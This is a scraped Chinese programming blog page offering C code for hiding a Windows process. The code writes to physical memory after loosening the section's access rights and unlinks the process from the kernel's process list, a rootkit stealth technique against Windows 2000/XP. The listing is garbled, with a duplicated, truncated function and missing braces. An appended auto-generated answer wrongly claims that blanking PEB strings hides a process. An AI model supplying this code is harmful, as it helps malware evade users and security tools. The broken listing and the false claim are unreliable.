Hide Process

<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
  1. #include <windows.h> 
  2. #include <Accctrl.h> 
  3. #include <Aclapi.h> 
  4. #define NT_SUCCESS(Status)          ((NTSTATUS) (Status) >= 0) 
  5. #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L) 
  6. #define STATUS_ACCESS_DENIED        ((NTSTATUS) 0xC0000022L) 
  7. typedef LONG NTSTATUS; 
  8. typedef struct _IO_STATUS_BLOCK 
  9.     NTSTATUS Status; 
  10.     ULONG Information; 
  11. } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 
  12. typedef struct _UNICODE_STRING 
  13.     USHORT Length; 
  14.     USHORT MaximumLength; 
  15.     PWSTR Buffer; 
  16. } UNICODE_STRING, *PUNICODE_STRING; 
  17. #define OBJ_INHERIT             0x00000002L 
  18. #define OBJ_PERMANENT           0x00000010L 
  19. #define OBJ_EXCLUSIVE           0x00000020L 
  20. #define OBJ_CASE_INSENSITIVE    0x00000040L 
  21. #define OBJ_OPENIF              0x00000080L 
  22. #define OBJ_OPENLINK            0x00000100L 
  23. #define OBJ_KERNEL_HANDLE       0x00000200L 
  24. #define OBJ_VALID_ATTRIBUTES    0x000003F2L 
  25. typedef struct _OBJECT_ATTRIBUTES 
  26.     ULONG Length; 
  27.     HANDLE RootDirectory; 
  28.     PUNICODE_STRING ObjectName; 
  29.     ULONG Attributes; 
  30.     PVOID SecurityDescriptor; 
  31.     PVOID SecurityQualityOfService; 
  32. } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 
  33. typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(OUT PHANDLE SectionHandle, 
  34.                                            IN ACCESS_MASK DesiredAccess, 
  35.                                            IN POBJECT_ATTRIBUTES ObjectAttributes); 
  36. typedef VOID (CALLBACK* RTLINITUNICODESTRING)(IN OUT PUNICODE_STRING DestinationString, 
  37.                                               IN PCWSTR SourceString); 
  38. RTLINITUNICODESTRING    RtlInitUnicodeString;
  39. ZWOPENSECTION           ZwOpenSection;
  40. HMODULE                 g_hNtDLL             = NULL;
  41. PVOID                   g_pMapPhysicalMemory = NULL;
  42. HANDLE                  g_hMPM               = NULL;
  43. OSVERSIONINFO           g_osvi; 
  44. //--------------------------------------------------------------------------- 
  45. BOOL InitNTDLL() 
  46.     g_hNtDLL = LoadLibrary("ntdll.dll"); 
  47.     
  48.     if (NULL == g_hNtDLL) 
  49.         return FALSE; 
  50.     
  51.     RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,      
  52.         "RtlInitUnicodeString"); 
  53.     ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); 
  54.     
  55.     return TRUE; 
  56. }
  57. //--------------------------------------------------------------------------- 
  58. VOID CloseNTDLL() 
  59.     if (NULL != g_hNtDLL) 
  60.         FreeLibrary(g_hNtDLL); 
  61.     
  62.     g_hNtDLL = NULL; 
  63. //--------------------------------------------------------------------------- 
  64. VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 
  65.     PACL pDacl = NULL;
  66.     PSECURITY_DESCRIPTOR pSD = NULL; 
  67.     PACL pNewDacl = NULL; 
  68.     
  69.     DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,      
  70.                                   NULL, &pDacl, NULL, &pSD);
  71.     
  72.     if (ERROR_SUCCESS != dwRes) 
  73.     {   
  74.         if (pSD) 
  75.             LocalFree(pSD);
  76.         if (pNewDacl) 
  77.             LocalFree(pNewDacl); 
  78.     }
  79.     
  80.     EXPLICIT_ACCESS ea; 
  81.     RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
  82.     ea.grfAccessPermissions = SECTION_MAP_WRITE; 
  83.     ea.grfAccessMode = GRANT_ACCESS; 
  84.     ea.grfInheritance= NO_INHERITANCE; 
  85.     ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
  86.     ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
  87.     ea.Trustee.ptstrName = "CURRENT_USER"
  88.     
  89.     dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl); 
  90.     
  91.     if (ERROR_SUCCESS != dwRes) 
  92.     {   
  93.         if(pSD) 
  94.             LocalFree(pSD);
  95.         if(pNewDacl) 
  96.             LocalFree(pNewDacl); 
  97.     }
  98.     dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 
  99.                             NULL, NULL, pNewDacl, NULL); 
  100.     
  101.     if (ERROR_SUCCESS != dwRes) 
  102.     { 
  103.         if (pSD)
  104.             LocalFree(pSD);
  105.         if (pNewDacl)
  106.             LocalFree(pNewDacl);
  107.     }
  108. }
  109. //--------------------------------------------------------------------------- 
  110. HANDLE OpenPhysicalMemory() 
  111. {
  112.     NTSTATUS status;
  113.     UNICODE_STRING physmemString;
  114.     OBJECT_ATTRIBUTES attributes;
  115.     ULONG PhyDirectory;
  116.     
  117.     g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 
  118.     GetVersionEx(&g_osvi); 
  119.     
  120.     if (5 != g_osvi.dwMajorVersion) 
  121.         return NULL; 
  122.     
  123.     switch (g_osvi.dwMinorVersion) 
  124.     { 
  125.     case 0:     //2k
  126.         PhyDirectory = 0x30000; 
  127.         break;
  128.     case 1:     //xp
  129.         PhyDirectory = 0x39000; 
  130.         break;
  131.     default:
  132.         return NULL;
  133.     }
  134.     
  135.     RtlInitUnicodeString(&physmemString, L"//Device//PhysicalMemory"); 
  136.     
  137.     attributes.Length                   = sizeof(OBJECT_ATTRIBUTES); 
  138.     attributes.RootDirectory            = NULL; 
  139.     attributes.ObjectName               = &physmemString; 
  140.     attributes.Attributes               = 0; 
  141.     attributes.SecurityDescriptor       = NULL; 
  142.     attributes.SecurityQualityOfService = NULL; 
  143.     
  144.     status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes); 
  145.     
  146.     if (status == STATUS_ACCESS_DENIED) 
  147.     { 
  148.         status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); 
  149.         SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
  150.         CloseHandle(g_hMPM); 
  151.         status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
  152.     }
  153.     
  154.     if (!NT_SUCCESS(status)) 
  155.         return NULL; 
  156.     
  157.     g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, 
  158.                            PhyDirectory, 0x1000); 
  159.     
  160.     if (g_pMapPhysicalMemory == NULL) 
  161.         return NULL;
  162.     
  163.     return g_hMPM; 
  164. }
  165. //--------------------------------------------------------------------------- 
  166. PVOID LinearToPhys(PULONG BaseAddress, PVOID addr) 
  167.     ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr; 
  168.     PGDE = BaseAddress[VAddr>>22];
  169.     
  170.     if (0 == (PGDE & 1)) 
  171.         return 0;
  172.     
  173.     ULONG tmp = PGDE & 0x00000080; 
  174.     
  175.     if (0 != tmp) 
  176.     { 
  177.         PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); 
  178.     } 
  179.     else 
  180.     { 
  181.         PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); 
  182.         PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12]; 
  183.         
  184.         if (0 == (PTE & 1)) 
  185.             return 0;
  186.         
  187.         PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF); 
  188.         UnmapViewOfFile((PVOID)PGDE);
  189.     } 
  190.     
  191.     return (PVOID)PAddr; 
  192. }
  193. //--------------------------------------------------------------------------- 
  194. ULONG GetData(PVOID addr) 
  195.     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); 
  196.     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 
  197.                     0, phys & 0xfffff000, 0x1000); 
  198.     
  199.     if (0 == tmp)
  200.         return 0; 
  201.     
  202.     ULONG ret = tmp[(phys & 0xFFF) >> 2]; 
  203.     UnmapViewOfFile(tmp);
  204.     
  205.     return ret; 
  206. }
  207. //--------------------------------------------------------------------------- 
  208. BOOL SetData(PVOID addr, ULONG data) 
  209.     ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); 
  210.     PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); 
  211.     
  212.     if (0 == tmp) 
  213.         return FALSE; 
  214.     
  215.     tmp[(phys & 0xFFF)>>2] = data;
  216.     UnmapViewOfFile(tmp);
  217.     
  218.     return TRUE; 
  219. }
  220. //--------------------------------------------------------------------------- 
  221. long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) 
  222.     ExitProcess(0);
  223.     return 1; 
  224. }
  225. //--------------------------------------------------------------------------- 
  226. BOOL YHideProcess() 
  227.     // SetUnhandledExceptionFilter(exeception); 
  228.     if (FALSE == InitNTDLL()) 
  229.         return FALSE; 
  230.     
  231.     if (0 == OpenPhysicalMemory()) 
  232.         return FALSE; 
  233.     
  234.     ULONG thread = GetData((PVOID)0xFFDFF124);      //kteb 
  235.     ULONG process = GetData(PVOID(thread + 0x44));  //kpeb 
  236.     
  237.     ULONG fw, bw;
  238.     if (0 == g_osvi.dwMinorVersion) 
  239.     { 
  240.         fw = GetData(PVOID(process + 0xa0)); 
  241.         bw = GetData(PVOID(process + 0xa4)); 
  242.     } 
  243.     
  244.     if (1 == g_osvi.dwMinorVersion) 
  245.     { 
  246.         fw = GetData(PVOID(process + 0x88)); 
  247.         bw = GetData
  248. //--------------------------------------------------------------------------- 
  249. BOOL YHideProcess() 
  250.     // SetUnhandledExceptionFilter(exeception); 
  251.     if (FALSE == InitNTDLL()) 
  252.         return FALSE; 
  253.     
  254.     if (0 == OpenPhysicalMemory()) 
  255.         return FALSE; 
  256.     
  257.     ULONG thread = GetData((PVOID)0xFFDFF124);      //kteb 
  258.     ULONG process = GetData(PVOID(thread + 0x44));  //kpeb 
  259.     
  260.     ULONG fw, bw;
  261.     if (0 == g_osvi.dwMinorVersion) 
  262.     { 
  263.         fw = GetData(PVOID(process + 0xa0)); 
  264.         bw = GetData(PVOID(process + 0xa4)); 
  265.     } 
  266.     
  267.     if (1 == g_osvi.dwMinorVersion) 
  268.     { 
  269.         fw = GetData(PVOID(process + 0x88)); 
  270.         bw = GetData(PVOID(process + 0x8c)); 
  271.     } 
  272.     
  273.     SetData(PVOID(fw + 4), bw); 
  274.     SetData(PVOID(bw), fw); 
  275.     
  276.     CloseHandle(g_hMPM); 
  277.     CloseNTDLL(); 
  278.     
  279.     return TRUE; 
  280. BOOL HideProcess() 
  281.     static BOOL b_hide = false
  282.     if (!b_hide) 
  283.     { 
  284.         b_hide = true
  285.         YHideProcess(); 
  286.         return true
  287.     } 
  288.     return true
<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
易语言是一种编程语言,它的hideprocess函数是用来隐藏进程的。下面是hideprocess函数的源码示例: ``` #include <Windows.h> void HideProcess() { // 获取当前进程句柄 HANDLE hProcess = GetCurrentProcess(); // 获取进程信息 PROCESS_BASIC_INFORMATION pbi; NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL); // 获取PEB地址 PPEB pPeb = pbi.PebBaseAddress; // 获取PEB中的ProcessParameters地址 PRTL_USER_PROCESS_PARAMETERS pProcessParams = pPeb->ProcessParameters; // 将CommandLine信息指向一个空字符串 pProcessParams->CommandLine.Length = 0; pProcessParams->CommandLine.MaximumLength = 0; pProcessParams->CommandLine.Buffer = L""; // 将ImagePathName信息指向一个空字符串 pProcessParams->ImagePathName.Length = 0; pProcessParams->ImagePathName.MaximumLength = 0; pProcessParams->ImagePathName.Buffer = L""; // 将DllPath信息指向一个空字符串 pProcessParams->DllPath.Length = 0; pProcessParams->DllPath.MaximumLength = 0; pProcessParams->DllPath.Buffer = L""; // 将WindowName信息指向一个空字符串 pProcessParams->WindowName.Length = 0; pProcessParams->WindowName.MaximumLength = 0; pProcessParams->WindowName.Buffer = L""; } ``` 以上是hideprocess函数的源码,它实现了隐藏进程的功能。hideprocess通过获取当前进程句柄,然后获取进程的PEB信息,进而获取到ProcessParameters的地址。接着将ProcessParameters中的CommandLine、ImagePathName、DllPath、WindowName等信息都指向一个空字符串,隐藏了进程的相关信息,从而达到隐藏进程的效果。 以上就是hideprocess函数的源码和简要解释,希望对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值